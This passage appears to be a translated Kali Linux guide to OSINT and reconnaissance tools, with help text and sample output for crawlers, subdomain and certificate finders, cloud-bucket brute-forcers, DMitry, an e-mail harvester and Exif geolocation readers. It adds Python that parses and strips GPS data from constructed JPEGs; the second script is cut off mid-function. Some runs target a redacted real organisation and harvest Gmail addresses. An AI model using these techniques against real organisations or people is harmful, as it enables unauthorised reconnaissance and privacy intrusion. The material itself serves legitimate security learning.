--timeout TIMEOUT http request timeout
--clone clone the website locally
--headers add headers
--dns enumerate subdomains and DNS data
--keys find secret keys
--only-urls only extract URLs
--wayback fetch URLs from archive.org as seeds
■ Example
root@kali:~# photon -u http://192.168.11.4 -l 3
[~] Level 1: 1 URLs
[!] Progress: 1/1
[~] Level 2: 5 URLs
[!] Progress: 5/5
[~] Level 3: 63 URLs
[!] Progress: 63/63
[~] Crawling 5 JavaScript files
[!] Progress: 5/5
--------------------------------------------------
[+] Files: 1
[+] Intel: 14
[+] Internal: 321
[+] Scripts: 5
[+] External: 298
[+] Fuzzable: 249
--------------------------------------------------
[!] Total requests made: 75
[!] Total time taken: 0 minutes 2 seconds
[!] Requests per second: 34
[+] Results saved in 192.168.11.4 directory
root@kali:~# ls 192.168.11.4
external.txt files.txt fuzzable.txt intel.txt internal.txt scripts.txt
root@kali:~# cat 192.168.11.4/intel.txt
http://192.168.11.4/mutillidae/index.php?page=credits.php:mutillidae-development@gmail.com
http://192.168.11.4/twiki/TWikiDocumentation.html:secondary@home.com
http://192.168.11.4/twiki/TWikiDocumentation.html:name@domain.com
http://192.168.11.4/mutillidae/./index.php?page=browser-info.php:abuse@iana.org
[...]
root@kali:~# cat 192.168.11.4/internal.txt
http://192.168.11.4/mutillidae/././index.php?do=toggle-hints&page=set-background-color.php
http://192.168.11.4/mutillidae/./index.php?do=toggle-security&page=source-viewer.php
http://192.168.11.4/mutillidae/index.php?page=documentation/?page=add-to-your-blog.php
http://192.168.11.4/mutillidae/./index.php?do=toggle-hints&page=show-log.php
[...]
OSINT(Open Source Intelligence)
Bing-ip2hosts
Searches Bing.com for the given IP address or hostname and scrapes the results to list the hostnames found.
■ Usage
root@kali:~# bing-ip2hosts --help
Usage: /usr/bin/bing-ip2hosts [OPTIONS] IP|hostname
OPTIONS are:
-o FILE Output hostnames to FILE.
-i FILE Input list of IP addresses or hostnames from FILE.
-n NUM Stop after NUM scraped pages return no new results (Default: 5).
-l Select the language for use in the setlang parameter (Default: en-us).
-m Select the market for use in the setmkt parameter (Default is unset).
-u Only display hostnames. Default is to include URL prefixes.
-c CSV output. Outputs the IP and hostname on each line, separated by a comma.
-q Quiet. Disable output except for final results.
-t DIR Use this directory instead of /tmp.
-V Display the version number of bing-ip2hosts and exit.
■ Example
root@kali:~# bing-ip2hosts microsoft.com
[...]
[▊] /search?q=ip%3A20.70.246.20+.&qs=n&first=70&FORM=PERE&setlang=en-us&setmkt=
http://www.research.microsoft.com
https://startups.microsoft.com
http://www.msdn.microsoft.com
https://startups.microsoft.com
http://www.research.microsoft.com
https://startups.microsoft.com
Stopping after scraping 5 pages without any new results.
https://microsoft.com/
https://startups.microsoft.com/
https://www.microsoft.com/
http://www.msdn.microsoft.com/
http://www.research.microsoft.com/
✓ Found 5 results after scraping 8 pages.
root@kali:~# bing-ip2hosts 203.180.216.158
[...]
https://www.city.adachi.tokyo.jp/
https://www.city.hiroshima.lg.jp/
https://www.city.kawasaki.jp/
https://www.city.kumamoto.jp/
https://www.city.machida.tokyo.jp/
https://www.city.sendai.jp/
https://www.gotokyo.org/
https://www.iodata.jp/
https://www.nishitetsu.jp/
https://www.pref.kanagawa.jp/
https://www.pref.kumamoto.jp/
https://www.pref.osaka.lg.jp/
✓ Found 12 results after scraping 10 pages.
CertGraph
Crawls the Subject Alternative Names of SSL certificates to collect hostnames.
■ Usage
root@kali:~# certgraph --help
Usage of certgraph: [OPTION]... HOST...
https://github.com/lanrat/certgraph
OPTIONS:
-cdn
include certificates from CDNs
-ct-expired
include expired certificates in certificate transparency search
-ct-subdomains
include sub-domains in certificate transparency search
-depth uint
maximum BFS depth to go (default 5)
-details
print details about the domains crawled
-dns
check for DNS records to determine if domain is registered
-driver string
driver to use [crtsh, google, http, smtp] (default "http")
-json
print the graph as json, can be used for graph in web UI
-parallel uint
number of certificates to retrieve in parallel (default 10)
-sanscap int
maximum number of uniq TLD+1 domains in certificate to include, 0 has no limit (default 80)
-save string
save certs to folder in PEM format
-timeout uint
tcp timeout in seconds (default 10)
-tldplus1
for every domain found, add tldPlus1 of the domain's parent
-updatepsl
Update the default Public Suffix List
-verbose
verbose logging
-version
print version and exit
■ Example
root@kali:~# certgraph yahoo.co.jp
yahoo.co.jp
info.hatalike.yahoo.co.jp
edge01.yahoo.co.jp
snsimg.carview.co.jp
digitalguide.jp
yimg.jp
yjtag.jp
shopping.yahooapis.jp
ms.yahoo.co.jp
mkimg.carview.co.jp
xml.listing.yahoo.co.jp
search.yahooapis.jp
frame.games.yahoo.co.jp
auctions.yahooapis.jp
store.yahoo.co.jp
[...]
cloud_enum
Searches for publicly exposed resources (object storage and the like) that a target organisation has on cloud services.
[Supported clouds]
- Amazon
- Microsoft
■ Usage
root@kali:~# cloud_enum --help
usage: cloud_enum [-h] (-k KEYWORD | -kf KEYFILE) [-m MUTATIONS] [-b BRUTE] [-t THREADS] [-ns NAMESERVER] [-l LOGFILE] [-f FORMAT]
[--disable-aws] [--disable-azure] [--disable-gcp] [-qs]
options:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: /usr/lib/cloud-enum/enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default: /usr/lib/cloud-enum/enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Appends found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv) - default: text
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans
■ Example
root@kali:~# cloud_enum -k ***** --disable-azure --disable-gcp
Keywords: *****
Mutations: /usr/lib/cloud-enum/enum_tools/fuzz.txt
Brute-list: /usr/lib/cloud-enum/enum_tools/fuzz.txt
[+] Mutations list imported: 242 items
[+] Mutated results: 1453 items
++++++++++++++++++++++++++
amazon checks
++++++++++++++++++++++++++
[+] Checking for S3 buckets
Protected S3 Bucket: http://*****.s3.amazonaws.com/
OPEN S3 BUCKET: http://*****-api.s3.amazonaws.com/
FILES:
->http://*****-api.s3.amazonaws.com/*****-api
->http://*****-api.s3.amazonaws.com/404.html
->http://*****-api.s3.amazonaws.com/*****Search.html
->http://*****-api.s3.amazonaws.com/favicon.ico
->http://*****-api.s3.amazonaws.com/index.html
->http://*****-api.s3.amazonaws.com/index_test.html
Protected S3 Bucket: http://*****-app.s3.amazonaws.com/
Protected S3 Bucket: http://*****-cloud.s3.amazonaws.com/
Protected S3 Bucket: http://*****.com.s3.amazonaws.com/
Protected S3 Bucket: http://*****-db.s3.amazonaws.com/
[...]
[+] Checking for AWS Apps
[*] Brute-forcing a list of 1453 possible DNS names
[!] DNS Timeout on *****-2.awsapps.com. Investigate if there are many of these.
[!] DNS Timeout on bamboo.*****.awsapps.com. Investigate if there are many of these.
[!] DNS Timeout on club*****.awsapps.com. Investigate if there are many of these.
[!] DNS Timeout on club-*****.awsapps.com. Investigate if there are many of these.
[!] DNS Timeout on *****qa.awsapps.com. Investigate if there are many of these.
[...]
CloudBrute
Searches for publicly exposed resources (object storage and the like) that a target organisation has on cloud services.
[Supported clouds]
- Amazon
- Microsoft
- DigitalOcean
- Alibaba
- Vultr
- Linode
■ Usage
root@kali:~# cloudbrute --help
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]
Awesome Cloud Enumerator
Arguments:
-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: /etc/cloudbrute/config
■ Example
# Scan for cloud storage matching the given keyword ***** using a wordlist
# The given domain is used to identify the cloud provider (it is resolved to an IP address, which is then looked up through the IPinfo API using its GEO information)
root@kali:~# cloudbrute -d *****.jp -k ***** -m storage -w /usr/share/cloudbrute/data/storage_small.txt
[...]
3:25AM INF Detect config path: /etc/cloudbrute/config/config.yaml
3:25AM INF Detect provider path: /etc/cloudbrute/config/modules
3:25AM INF Initialized scan config
3:25AM INF amazon detected
3:25AM INF Initialized amazon config
80 / 336 [================================>--------------------------------------------------------------------------------------------------------] 23.81% 00m04s
3:25AM WRN 403: Protected - *****-demo.s3.amazonaws.com
336 / 336 [============================================================================================================================================] 100.00% 4s
DMitry
Performs WHOIS lookups, subdomain searches, e-mail address collection, port scans and more in one run.
■ Usage
root@kali:~# dmitry --help
Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host
-o Save output to %host.txt or to file specified by -o file
-i Perform a whois lookup on the IP address of a host
-w Perform a whois lookup on the domain name of a host
-n Retrieve Netcraft.com information on a host
-s Perform a search for possible subdomains
-e Perform a search for possible email addresses
-p Perform a TCP port scan on a host
* -f Perform a TCP port scan on a host showing output reporting filtered ports
* -b Read in the banner received from the scanned port
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )
*Requires the -p flagged to be passed
■ Example
root@kali:~# dmitry -winsepo result.txt example.com
[...]
HostIP:93.184.215.14
HostName:example.com
Gathered Inet-whois information for 93.184.215.14
---------------------------------
inetnum: 93.184.212.0 - 93.184.215.255
netname: EDGECAST-NETBLK-03
descr: NETBLK-03-EU-93-184-212-0-22
country: EU
[...]
Gathered Inic-whois information for example.com
---------------------------------
Domain Name: EXAMPLE.COM
Registry Domain ID: 2336799_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.iana.org
Registrar URL: http://res-dom.iana.org
Updated Date: 2024-08-14T07:01:34Z
Creation Date: 1995-08-14T04:00:00Z
Registry Expiry Date: 2025-08-13T04:00:00Z
Registrar: RESERVED-Internet Assigned Numbers Authority
[...]
Gathered Subdomain information for example.com
---------------------------------
Searching Google.com:80...
HostName:www.example.com
HostIP:93.184.215.14
HostName:WWW.example.com
HostIP:93.184.215.14
Searching Altavista.com:80...
Found 2 possible subdomain(s) for host example.com, Searched 0 pages containing 0 results
[...]
Gathered E-Mail information for example.com
---------------------------------
Searching Google.com:80...
someone@example.com
info@example.com
example@example.com
name@example.com
someoneelse@example.com
[...]
Gathered TCP Port information for 93.184.215.14
---------------------------------
Port State
80/tcp open
Portscan Finished: Scanned 150 ports, 0 ports were in state closed
EmailHarvester
Collects e-mail addresses using the major search engines.
■ Usage
root@kali:~# emailharvester --help
usage: EmailHarvester.py [-h] [-d DOMAIN] [-s FILE] [-e ENGINE] [-l LIMIT] [-u USER-AGENT] [-x PROXY] [--noprint] [-r EXCLUDED_PLUGINS] [-p]
options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Domain to search.
-s FILE, --save FILE Save the results into a TXT and XML file (both).
-e ENGINE, --engine ENGINE
Select search engine plugin(eg. '-e google').
-l LIMIT, --limit LIMIT
Limit the number of results.
-u USER-AGENT, --user-agent USER-AGENT
Set the User-Agent request header.
-x PROXY, --proxy PROXY
Setup proxy server (eg. '-x http://127.0.0.1:8080')
--noprint EmailHarvester will print discovered emails to terminal. It is possible to tell EmailHarvester not to print results to terminal with this option.
-r EXCLUDED_PLUGINS, --exclude EXCLUDED_PLUGINS
Plugins to exclude when you choose 'all' for search engine (eg. '-r google,twitter')
-p, --list-plugins List all available plugins.
■ Example
# Collect Gmail addresses found on LinkedIn via search engines
root@kali:~# emailharvester -d gmail.com -e linkedin
[+] User-Agent in use: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
[+] Searching in Linkedin
[+] Searching in Yahoo + Linkedin: 101 results
[+] Searching in Bing + Linkedin: 50 results
[+] Searching in Bing + Linkedin: 100 results
[+] Searching in Google + Linkedin: 100 results
[+] Searching in Baidu + Linkedin: 10 results
[+] Searching in Baidu + Linkedin: 20 results
[+] Searching in Baidu + Linkedin: 30 results
[+] Searching in Baidu + Linkedin: 40 results
[+] Searching in Baidu + Linkedin: 50 results
[+] Searching in Baidu + Linkedin: 60 results
[+] Searching in Baidu + Linkedin: 70 results
[+] Searching in Baidu + Linkedin: 80 results
[+] Searching in Baidu + Linkedin: 90 results
[+] Searching in Baidu + Linkedin: 100 results
[+] Searching in Exalead + Linkedin: 50 results
[+] Searching in Exalead + Linkedin: 100 results
[+] Emails found: 82
******@gmail.com
******@gmail.com
******@gmail.com
******@gmail.com
******@gmail.com
Exif Looter
Extracts the location data contained in an image's Exif metadata.
■ Usage
root@kali:~# exiflooter --help
Usage:
exifLooter [flags]
Flags:
-d, --directory string Specify a directory for Analyzing
-h, --help help for exifLooter
-i, --image string Specify a image for Analyzing
-m, --open-street-map Get Open Street Map Link
-p, --pipe Pipe with other scripts
-r, --remove Remove metadata from Image
■ Example
# Image used: https://github.com/ianare/exif-samples
root@kali:~# exiflooter -i DSCN0010.jpg -m
GPS Latitude Ref: North
GPS Longitude Ref: East
GPS Altitude Ref: Above Sea Level
GPS Time Stamp: 14
GPS Satellites: 06
GPS Img Direction Ref: Unknown ()
GPS Map Datum: WGS-84
GPS Date Stamp: 2008
GPS Date/Time: 2008
GPS Latitude: 43 deg 28´ 2.81″ N
GPS Longitude: 11 deg 53´ 6.46″ E
GPS Position: 43 deg 28´ 2.81″ N, 11 deg 53´ 6.46″ E
EXIF Geolocation Data Not Stripped From Uploaded Images
https://www.openstreetmap.org/?mlat=43.467448&mlon=11.885127&zoom=12
Open the generated link in a browser to check the location.
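The coordinates Exif Looter prints above come from the GPS IFD inside the JPEG's Exif APP1 segment (the same SOI / APP1 / TIFF / IFD layout that the exifprobe output further down walks through). As an added example that is not part of the original post or of either tool, the Python script below parses that structure from a constructed sample JPEG, converts the degree/minute/second rationals into the decimal value used in the OpenStreetMap link, and writes back a copy with the Exif segment removed, which is the fix for the "Geolocation Data Not Stripped From Uploaded Images" finding. The sample image, its coordinates and every function name here are constructed for the example.

```python
"""Read GPS coordinates from a JPEG's Exif segment and strip the segment.

Standard library only. The JPEG used below is constructed inline (no real
photo); field names follow the TIFF/Exif spec, everything else is an
assumption made for this example.
"""
import struct

GPS_INFO_TAG = 0x8825             # IFD0 entry pointing at the GPS IFD
ASCII, LONG, RATIONAL = 2, 4, 5   # TIFF field types used here


def _rational(num, den):
    return struct.pack("<II", num, den)


def build_sample_jpeg(lat_dms, lon_dms, lat_ref=b"N", lon_ref=b"E"):
    """Constructed sample: SOI, one Exif APP1 (little-endian TIFF, IFD0 ->
    GPS IFD with LatRef/Lat/LonRef/Lon) and EOI. No image data at all."""
    tiff = b"II" + struct.pack("<HI", 0x2A, 8)          # header, IFD0 at offset 8
    gps_off = 8 + 2 + 12 + 4                             # IFD0 = count + 1 entry + next ptr
    ifd0 = struct.pack("<H", 1)
    ifd0 += struct.pack("<HHII", GPS_INFO_TAG, LONG, 1, gps_off)
    ifd0 += struct.pack("<I", 0)
    values_off = gps_off + 2 + 12 * 4 + 4                # data area after 4 GPS entries
    lat = b"".join(_rational(n, d) for n, d in lat_dms)
    lon = b"".join(_rational(n, d) for n, d in lon_dms)
    ent = struct.pack("<HHI4s", 1, ASCII, 2, lat_ref + b"\0\0\0")  # GPSLatitudeRef (inline)
    ent += struct.pack("<HHII", 2, RATIONAL, 3, values_off)        # GPSLatitude d/m/s
    ent += struct.pack("<HHI4s", 3, ASCII, 2, lon_ref + b"\0\0\0")  # GPSLongitudeRef
    ent += struct.pack("<HHII", 4, RATIONAL, 3, values_off + len(lat))  # GPSLongitude
    gps = struct.pack("<H", 4) + ent + struct.pack("<I", 0) + lat + lon
    payload = b"Exif\0\0" + tiff + ifd0 + gps
    app1 = b"\xff\xe1" + struct.pack(">H", len(payload) + 2) + payload
    return b"\xff\xd8" + app1 + b"\xff\xd9"


def _segments(jpeg):
    """Yield (start, end, marker) for every marker segment before SOS/EOI."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):          # EOI / SOS: entropy-coded data follows
            break
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        yield pos, pos + 2 + length, marker
        pos += 2 + length


def _is_exif(jpeg, start, marker):
    return marker == 0xE1 and jpeg[start + 4:start + 10] == b"Exif\0\0"


def _read_ifd(tiff, off, e):
    """Return {tag: (type, count, raw 4-byte value-or-offset)} for one IFD."""
    (n,) = struct.unpack(e + "H", tiff[off:off + 2])
    out = {}
    for i in range(n):
        at = off + 2 + 12 * i
        tag, typ, cnt = struct.unpack(e + "HHI", tiff[at:at + 8])
        out[tag] = (typ, cnt, tiff[at + 8:at + 12])
    return out


def _rationals(tiff, entry, e):
    typ, cnt, raw = entry
    (off,) = struct.unpack(e + "I", raw)    # 3 RATIONALs = 24 bytes, never inline
    vals = struct.unpack(e + "II" * cnt, tiff[off:off + 8 * cnt])
    return [(vals[2 * i], vals[2 * i + 1]) for i in range(cnt)]


def dms_to_decimal(dms, ref):
    """(deg, min, sec) rationals -> signed decimal degrees (S/W negative)."""
    d, m, s = (n / den for n, den in dms)
    dec = d + m / 60 + s / 3600
    return -dec if ref in ("S", "W") else dec


def extract_gps(jpeg):
    """Return (lat, lon) in decimal degrees, or None if there is no GPS IFD."""
    for start, end, marker in _segments(jpeg):
        if not _is_exif(jpeg, start, marker):
            continue
        tiff = jpeg[start + 10:end]                     # skip marker, length, "Exif\0\0"
        e = "<" if tiff[:2] == b"II" else ">"           # II = Intel, MM = Motorola
        (ifd0_off,) = struct.unpack(e + "I", tiff[4:8])
        ifd0 = _read_ifd(tiff, ifd0_off, e)
        if GPS_INFO_TAG not in ifd0:
            return None
        (gps_off,) = struct.unpack(e + "I", ifd0[GPS_INFO_TAG][2])
        gps = _read_ifd(tiff, gps_off, e)
        if not {1, 2, 3, 4}.issubset(gps):
            return None
        lat_ref = gps[1][2].rstrip(b"\0").decode("ascii")
        lon_ref = gps[3][2].rstrip(b"\0").decode("ascii")
        return (dms_to_decimal(_rationals(tiff, gps[2], e), lat_ref),
                dms_to_decimal(_rationals(tiff, gps[4], e), lon_ref))
    return None


def osm_link(lat, lon):
    """Same link shape that exiflooter -m prints."""
    return f"https://www.openstreetmap.org/?mlat={lat:.6f}&mlon={lon:.6f}&zoom=12"


def strip_exif(jpeg):
    """Copy of the JPEG with every Exif APP1 segment dropped; image data kept."""
    out, tail = bytearray(jpeg[:2]), 2
    for start, end, marker in _segments(jpeg):
        if not _is_exif(jpeg, start, marker):
            out += jpeg[start:end]
        tail = end
    out += jpeg[tail:]                                  # SOS + scan data + EOI untouched
    return bytes(out)


if __name__ == "__main__":
    sample = build_sample_jpeg(((43, 1), (28, 1), (281, 100)), ((11, 1), (53, 1), (646, 100)))
    lat, lon = extract_gps(sample)
    print(f"GPS Position: {lat:.6f}, {lon:.6f}")
    print(osm_link(lat, lon))
    print("after strip_exif:", extract_gps(strip_exif(sample)))
```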
Exifprobe
Prints an image's file structure, auxiliary data and metadata.
■ Usage
root@kali:~# exifprobe -h
Usage:
exifprobe [options] filenames(s)
-h - print this help message
-V - print program version and copyright
-R - Report mode: only tagnames and decimal values, indented, inline
-S - Structure mode: everything, offset values not inline (default)
-L - List mode: list all tags and values (only); no structure
-Z - Zero (turn off) all output flags
-a - toggle print addresses in hex and decimal
-D - toggle print enabled addresses, tag numbers and values in decimal only
-X - toggle print enabled addresses, tag numbers and values in hex only
-I - toggle indent (after address -> before -> none)
-i - toggle "inline" print of IFD values
-n - toggle printing of filename at start of each output line
-c - toggle use of color to highlight certain sections
-u - print all 16 bits of unicode data
-p[items] - toggle print identifiers for:
s - sections
g - segments
e - IFD entries
a - expand known entries in APP0...APPN segents
m - print MakerNote scheme detection info
M - debug MakerNote scheme detection info
l - long tagnames (default in List mode)
-e[items] - toggle print IFD entry items:
t - tagname
n - tag number in decimal
N - tag number in hex
T - entry type
v - value in decimal
V - value in hex
o - file offset to value in decimal
O - file offset to value in hex
r - relative (unadjusted) offset in decimal
R - print "raw" values where expansion of values is needed
a - print ascii strings until null, rather than by length
A - print ALL elements of multiple-value tags
-M[len|a] - hex/ascii dump 'len' (or all) bytes of unknown MakerNotes
-A[len|a] - hex/ascii dump 'len' (or all) bytes of unknown APPn segments
-U[len|a] - hex/ascii dump 'len' (or all) bytes of UNDEFINED data of unknown format
-B[len|a] - hex/ascii dump 'len' (or all) bytes of binary images or invalid JPEG data
-N[num] - force noteversion 'num' for MakerNote interpretation
-m[name] - force use of maker 'name' to select MakerNote interpretation routines
-l[model] - force use of 'model' to select MakerNote interpretation routines
-O[offset] - start processing at 'offset' in file
-C[make]+[model] - print makes matching 'make', models matching 'model' (substrings)
■ Usage example
# Sample image: https://github.com/ianare/exif-samples
root@kali:~# exifprobe DSCN0010.jpg
File Name = DSCN0010.jpg
File Type = JPEG
File Size = 161713
@000000000=0 : <JPEG_SOI>
@0x0000002=2 : <JPEG_APP1> 0xffe1 length 11258, 'Exif'
@0x000000c=12 : TIFF(II=0x4949) magic=0x002a='*\0' ifd offset = 8 (+ 12 = 0x14/20)
@0x0000014=20 : <IFD 0> 12 entries starting at file offset 0x16=22
@0x0000016=22 : <0x010e= 270> ImageDescription [2 =ASCII 32] = @0xaa=170
@0x0000022=34 : <0x010f= 271> Make [2 =ASCII 6] = @0xca=202
[...]
@0x00000a6=166 : **** next IFD offset 4454(+ 12 = 0x1172/4466)
@0x00000aa=170 : ============= VALUES, IFD 0 ============
@0x00000aa=170 : ImageDescription = ' \0'
@0x00000ca=202 : Make = 'NIKON\0'
@0x00000d0=208 : Model = 'COOLPIX P6000\0'
@0x00000de=222 : XResolution = 300
@0x00000e6=230 : YResolution = 300
@0x00000ee=238 : Software = 'Nikon Transfer 1.1 W\0'
@0x0000104=260 : DateTime = '2008:11:01 21:15:07\0'
@0x0000118=280 : <EXIF IFD> (in IFD 0) 34 entries starting at file offset 0x11a=282
@0x000011a=282 : <0x829a=33434> ExposureTime [5 =RATIONAL 1] = @0x2b6=694
@0x0000126=294 : <0x829d=33437> FNumber [5 =RATIONAL 1] = @0x2be=702
[...]
@0x00002b2=690 : **** next IFD offset 0
@0x00002b6=694 : ============= VALUES, EXIF IFD ============
@0x00002b6=694 : ExposureTime = 0.0133333 sec
@0x00002be=702 : FNumber = 5.9 APEX = 'f7.7'
@0x00002c6=710 : DateTimeOriginal = '2008:10:22 16:28:39\0'
@0x00002da=730 : DateTimeDigitized = '2008:10:22 16:28:39\0'
@0x00002ee=750 : ExposureBiasValue = 0 APEX
@0x00002f6=758 : MaxApertureValue = 2.9 APEX = 'f2.7'
@0x00002fe=766 : FocalLength = 24 mm
[...]
-0x000116b=4459 : </EXIF IFD>
@0x00003aa=938 : <GPS IFD> (in IFD 0) 10 entries starting at file offset 0x3ac=940
@0x00003ac=940 : <0x0001= 1> LatitudeRef [2 =ASCII 2] = 'N'
@0x00003b8=952 : <0x0002= 2> Latitude [5 =RATIONAL 3] = @0x428=1064
[...]
@0x0000424=1060 : **** next IFD offset 0
@0x0000428=1064 : ============= VALUES, GPS IFD ============
@0x0000428=1064 : Latitude = 43,28,2.814
@0x0000440=1088 : Longitude = 11,53,6.456
@0x0000458=1112 : TimeStamp = 14,27,7.24
@0x0000470=1136 : MapDatum = 'WGS-84 \0'
@0x000047a=1146 : DateStamp = '2008:10:23\0'
-0x0000484=1156 : </GPS IFD>
@0x000116b=4459 : </IFD 0>
@0x0001172=4466 : <IFD 1> 6 entries starting at file offset 0x1174=4468
@0x0001174=4468 : <0x0103= 259> Compression [3 =SHORT 1] = 6 = 'Exif/old JPEG'
@0x0001180=4480 : <0x011a= 282> XResolution [5 =RATIONAL 1] = @0x11c0=4544
[...]
@0x0002bfd=11261 : </IFD 1>
-0x0002bfd=11261 : </JPEG_APP1>
@0x0002bfe=11262 : <JPEG_DQT> length 197
@0x0002cc5=11461 : <JPEG_DHT> length 418 table class = 0 table id = 0
@0x0002e69=11881 : <JPEG_SOF_0> length 17, 8 bits/sample, components=3, width=640, height=480
@0x0002e7c=11900 : <JPEG_APP1> 0xffe1 length 4031, 'http://ns.adobe.com/xap/1.0/' - unknown format - (not dumped: use -A)
-0x0003e3c=15932 : </JPEG_APP1>
@0x0003e3d=15933 : <JPEG_SOS> length 12 start of JPEG data, 3 components 307200 pixels
@0x00277af=161711 : <JPEG_EOI> JPEG length 161713
-0x00277b0=161712 : END OF FILE
@000000000=0 : Start of JPEG baseline DCT compressed primary image [640x480] length 161713
-0x00277b0=161712 : End of JPEG primary image data
@0x00011d0=4560 : Start of JPEG baseline DCT compressed reduced-resolution image [160x120] length 6702 (IFD 1)
-0x0002bfd=11261 : End of JPEG reduced-resolution image data
Number of images = 2
File Format = JPEG/APP1/TIFF/EXIF # with MakerNote (Nikon Corporation [2])
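As an added example (not from the page and not exifprobe's own code), the following Python walks the same structure that the dump above shows: the JPEG marker segments up to the Exif APP1, the TIFF header, IFD0, and the GPS sub-IFD reached through the 0x8825 pointer, then converts the degree/minute/second rationals into decimal degrees so an image can be checked for embedded location data before it is published. The sample JPEG is constructed inline (metadata only, no image data) with the Nikon and coordinate values taken from the output above.

```python
import struct

# Subset of the TIFF 6.0 / Exif tag tables used by this example
IFD_TAGS = {0x010F: "Make", 0x0110: "Model", 0x0132: "DateTime",
            0x8769: "ExifIFD", 0x8825: "GPSIFD",
            0x829A: "ExposureTime", 0x9003: "DateTimeOriginal"}
GPS_TAGS = {0x0001: "GPSLatitudeRef", 0x0002: "GPSLatitude",
            0x0003: "GPSLongitudeRef", 0x0004: "GPSLongitude",
            0x001D: "GPSDateStamp"}
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1, 9: 4, 10: 8}  # bytes per element


def find_exif_tiff(jpeg: bytes) -> bytes:
    """Walk the JPEG marker segments and return the TIFF block inside the Exif APP1."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI / SOS: no further metadata segments
            break
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]  # includes the length bytes
        if marker == 0xE1 and jpeg[pos + 4:pos + 10] == b"Exif\0\0":
            return jpeg[pos + 10:pos + 2 + length]
        pos += 2 + length
    return b""


def parse_ifd(tiff: bytes, offset: int, e: str, names: dict) -> dict:
    """Decode one IFD: 2-byte entry count, 12-byte entries, 4-byte next-IFD pointer."""
    count = struct.unpack(e + "H", tiff[offset:offset + 2])[0]
    out = {}
    for i in range(count):
        ent = offset + 2 + 12 * i
        tag, typ, n = struct.unpack(e + "HHI", tiff[ent:ent + 8])
        size = TYPE_SIZES.get(typ, 1) * n
        if size <= 4:  # value is stored inline in the entry
            raw = tiff[ent + 8:ent + 8 + size]
        else:          # entry holds an offset (from the TIFF header) to the value
            off = struct.unpack(e + "I", tiff[ent + 8:ent + 12])[0]
            raw = tiff[off:off + size]
        name = names.get(tag, "0x%04x" % tag)
        if typ == 2:    # ASCII, NUL-terminated
            out[name] = raw.split(b"\0", 1)[0].decode("ascii", "replace")
        elif typ == 5:  # RATIONAL: (numerator, denominator) pairs
            v = struct.unpack(e + "II" * n, raw)
            out[name] = [(v[j], v[j + 1]) for j in range(0, 2 * n, 2)]
        elif typ in (3, 4):  # SHORT / LONG
            v = struct.unpack(e + ("H" if typ == 3 else "I") * n, raw)
            out[name] = v[0] if n == 1 else list(v)
        else:
            out[name] = raw
    return out


def extract_exif(jpeg: bytes) -> dict:
    """Return IFD0 tags merged with the Exif and GPS sub-IFDs (pointers 0x8769 / 0x8825)."""
    tiff = find_exif_tiff(jpeg)
    if not tiff:
        return {}
    e = "<" if tiff[:2] == b"II" else ">"  # 'II' = Intel/little-endian, 'MM' = Motorola
    magic, ifd0 = struct.unpack(e + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    tags = parse_ifd(tiff, ifd0, e, IFD_TAGS)
    for ptr, names in (("ExifIFD", IFD_TAGS), ("GPSIFD", GPS_TAGS)):
        if ptr in tags:
            tags.update(parse_ifd(tiff, tags.pop(ptr), e, names))
    return tags


def gps_location(tags: dict):
    """Convert degree/minute/second rationals to signed decimal degrees, or None if absent."""
    if "GPSLatitude" not in tags or "GPSLongitude" not in tags:
        return None
    def dec(dms, ref):
        d, m, s = (num / den for num, den in dms)
        val = d + m / 60 + s / 3600
        return -val if ref in ("S", "W") else val
    return (round(dec(tags["GPSLatitude"], tags.get("GPSLatitudeRef", "N")), 6),
            round(dec(tags["GPSLongitude"], tags.get("GPSLongitudeRef", "E")), 6))


def build_ifd(entries, ifd_offset: int) -> bytes:
    """Serialise (tag, type, count, payload) entries; payloads over 4 bytes follow the IFD."""
    data_off = ifd_offset + 2 + 12 * len(entries) + 4
    ifd, data = struct.pack("<H", len(entries)), b""
    for tag, typ, n, payload in entries:
        if len(payload) <= 4:
            ifd += struct.pack("<HHI", tag, typ, n) + payload.ljust(4, b"\0")
        else:
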